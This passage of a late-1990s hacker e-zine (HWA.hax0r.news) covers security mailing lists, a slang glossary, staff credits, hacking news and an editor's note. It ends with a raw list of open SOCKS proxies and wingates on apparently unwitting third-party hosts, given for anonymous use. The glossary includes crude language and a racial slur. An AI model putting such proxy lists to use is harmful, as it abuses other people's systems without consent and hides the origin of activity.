What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To subscribe:
send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net
Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.
To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
discussion of Windows-related security issues.
With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.
While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.
The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:
To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net
To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net
Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker loophole BlkOps
Folks from #hwa.hax0r,news and #fawkerz, and other leet
secret channels ... ;-)
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ Hackers: Governments hacks pointless
Contributed by Zym0t1c
The Feds aren't the only ones who don't approve of hacker attacks on several
government Web sites. Some hackers are also condemning the exploits,
calling them juvenile and pointless.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2269312,00.html?chkpt=zdnnsmsa
++ Hackers say they'll take off New Year's
Contributed by Zym0t1c
Two hacking groups have struck again, defacing several Web pages around the
Internet. This time, however, they have a message for others looking to
circumvent security on the Net: Don't hack over the New Year's weekend.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2413134,00.html
++ A Hacker Christmas
Contributed by Zym0t1c
Last-minute gift purchases for the hacker in the house, by Kevin Poulsen.
Read the article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html?chkpt=zdnnsmsa
++ Government asks hackers for Y2K break
Contributed by Zym0t1c
WASHINGTON - President Clinton's top aide on Y2K matters has urged computer
hackers to exercise self-restraint until after year 2000 technology fears
largely have passed.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2408969,00.html?chkpt=zdnnsmsa
++ 'Net Attack' program threatens Internet sites
Contributed by Zym0t1c
Just before New Year, a new version of the so called 'Net Attack' or Tribe
Flood Network (TFN) program was released. This version, TFN2K, is much more
powerful and more difficult to detect. Experts fear that hackers will use
TFN to hack into networks while everybody is celebrating New Year.
Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=3749
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* w00t merry Christmas, Happy Hannukah or however the
* fuck you spell it and Merry Yuletide etc etc oh ya
* and Ramadan (Yeah I know its not this time of year
* whatever, religion isn't what this is about), anyway
* happy holidays and enjoy a new fun packed issue of HWA
* complete with yer favourite info and proxy lists, smurf
* amplifiers and some leet exploits.... werd up, and
* get securing those boxes! hope you don't get called in
* to fix script-kiddy damage over the holidays!
*
* Cruci
*
* cruciphux@dok.org
* ICQ:58939315 note; not always online, do not abuse!
* Preffered chat method: IRC Efnet in #HWA.hax0r.news
*
*/
printf ("EoF.\n");
}
Snailmail:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
Tip of the week: .us domains are free of charge to register.
http://www.nic.us/usdom-overview.html#Cost of course you need
to be in the .us to use this (or figure out a way to phake it) *g*
03.0 Socks proxies, Wingates and more from IRC4ALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by: HWA Staff (Yeah -Ed :-p)
WELL MAINTAINED and updated site. Check it out for proxy info.
highly recommended - Ed.
This site is located at http://www.lightspeed.de/irc4all/
No formatting, data is presented raw direct from site.
Most proxies are socks4 or 5, wingates are 4, ports are
commonly 1080 or 8080 if you don't know how to use these
don't use them! - Ed
Common ports for proxy use:
Port Wingate service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
21 FTP Proxy Server
23 Telnet Proxy Server
53 DNS Proxy Server
80 WWW Proxy Server
110 POP3 Proxy Server
808 Remote Control Service
1080 SOCKS Proxy Server
1090 Real Audio Proxy Server
7000 VDOlive Proxy Server
8000 XDMA Proxy Server
8010 Log Service
Not all services will work on all proxies/wingates, you will have to play
with them and try them out. Also admins close these down frequently but
there ARE active useable proxies on the following lists, Play nice and
don't over use or abuse. - Ed
NotFound,200.36.19.225,
NotFound,206.103.12.131,
NotFound,210.56.18.225,
NotFound,210.56.18.226,
NotFound,210.56.18.241,
NotFound,200.248.68.129,
NotFound,210.56.18.253,
NotFound,200.248.69.50,
noeljo9.lnk.telstra.net,139.130.54.153,
modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215,
edtn004203.hs.telusplanet.net,161.184.152.139,
NotFound,195.14.148.98,
blissr.lnk.telstra.net,139.130.54.131,
PPP46-166.lvsb.vsnl.net.in,202.54.46.166,
cr216724724.cable.net.co,216.72.47.24,
cr216724718.cable.net.co,216.72.47.18,
122-94.w3.com.uy,207.3.122.94,
saward.lnk.telstra.net,139.130.55.98,
icqtwsrv1.maiowoo.com,203.135.240.3,
NotFound,212.22.69.35,
122-85.w3.com.uy,207.3.122.85,
gw.eudynelson.com,207.176.25.66,
sis-zeus.sville.edu.ph,207.0.119.67,
dns-server1.tj.pa.gov.br,200.242.244.1,
theleu.lnk.telstra.net,139.130.74.160,
210-55-191-125.ipnets.xtra.co.nz,210.55.191.125,
nor24788-1.gw.connect.com.au,202.21.13.46,
NotFound,210.161.200.82,
www.slcr.cz,212.27.210.65,
NotFound,210.56.19.5,
northeastmicro.com,204.170.187.254,
NotFound,195.5.33.222,
marina.amakusa.gr.jp,210.164.238.50,
h0040053c7824.ne.mediaone.net,24.128.48.55,
NotFound,216.72.45.152,
tconl9076.tconl.com,204.26.90.76,
NotFound,193.227.185.210,
NotFound,194.243.99.199,
NotFound,202.54.48.85,
NotFound,200.21.157.61,
server.goway.com,205.206.42.162,
web.urudata.com.uy,207.3.122.84,
cr2167248104.cable.net.co,216.72.48.104,
frontier.netline.net.au,203.28.52.160,
interate.com.pe,209.45.73.174,
210-55-191-126.ipnets.xtra.co.nz,210.55.191.126,
com3058-2.gw.connect.com.au,202.21.8.108,
PPP46-254.lvsb.vsnl.net.in,202.54.46.254,
NotFound,195.14.148.99,
ibp.santa.krs.ru,195.161.57.133,
mail.theova.com,195.14.148.65,
cr2167254143.cable.net.co,216.72.54.143,
NotFound,142.250.6.2,
plebiscito.synapsis.it,195.31.227.14,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
other.issei-dc.co.jp,210.164.241.99,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
NotFound,209.177.38.98,
www.ymts.sakha.ru,194.186.182.2,
mail.ermanco.com,12.2.82.130,
mail1.bikesusa.com,207.176.25.114,
ewwmail.ozemail.com.au,203.108.128.242,
modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106,
patter.lnk.telstra.net,139.130.81.160,
server.hirup.khmelnitskiy.ua,195.230.134.227,
port58151.btl.net,206.153.58.151,
wdpcbalt.wdpc.com,208.222.211.65,
dns.gincorp.co.jp,210.164.86.34,
ts18.svamberk.cz,212.47.11.231,
mail.coolmore.com.au,203.12.145.98,
NotFound,195.14.148.101,
cr216724770.cable.net.co,216.72.47.70,
ip110.gte5.rb1.bel.nwlink.com,209.20.218.110,
ci272608-a.sptnbrg1.sc.home.com,24.4.115.144,
edsl78.mpls.uswest.net,209.181.225.79,
NotFound,210.114.231.130,
mooty.lnk.telstra.net,139.130.81.14,
NotFound,168.187.78.34,
NotFound,203.116.5.58,
c111.h202052116.is.net.tw,202.52.116.111,
cr2167251178.cable.net.co,216.72.51.178,
altona.lnk.telstra.net,139.130.80.123,
NotFound,139.130.59.187,
nevisco.city.tvnet.hu,195.38.100.242,
edtn003590.hs.telusplanet.net,161.184.150.34,
NotFound,193.15.227.125,
dns1.ctsjp.co.jp,210.172.87.146,
gaon.zg.szczecin.pl,195.116.25.98,
NotFound,195.5.33.218,
edtn003331.hs.telusplanet.net,161.184.149.29,
edtn003725.hs.telusplanet.net,161.184.150.169,
dt027n36.san.rr.com,24.30.137.54,
tsp-proxy.tsss.com,12.2.81.50,
austra53.lnk.telstra.net,139.130.56.114,
NotFound,195.161.69.65,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
cascad.lnk.telstra.net,139.130.44.197,
edtn003171.hs.telusplanet.net,161.184.148.123,
tob24399-1.gw.connect.com.au,202.21.14.234,
ad112-162.magix.com.sg,165.21.112.162,
NotFound,195.146.98.226,
NotFound,193.232.250.133,
lesy.vol.cz,212.27.211.5,
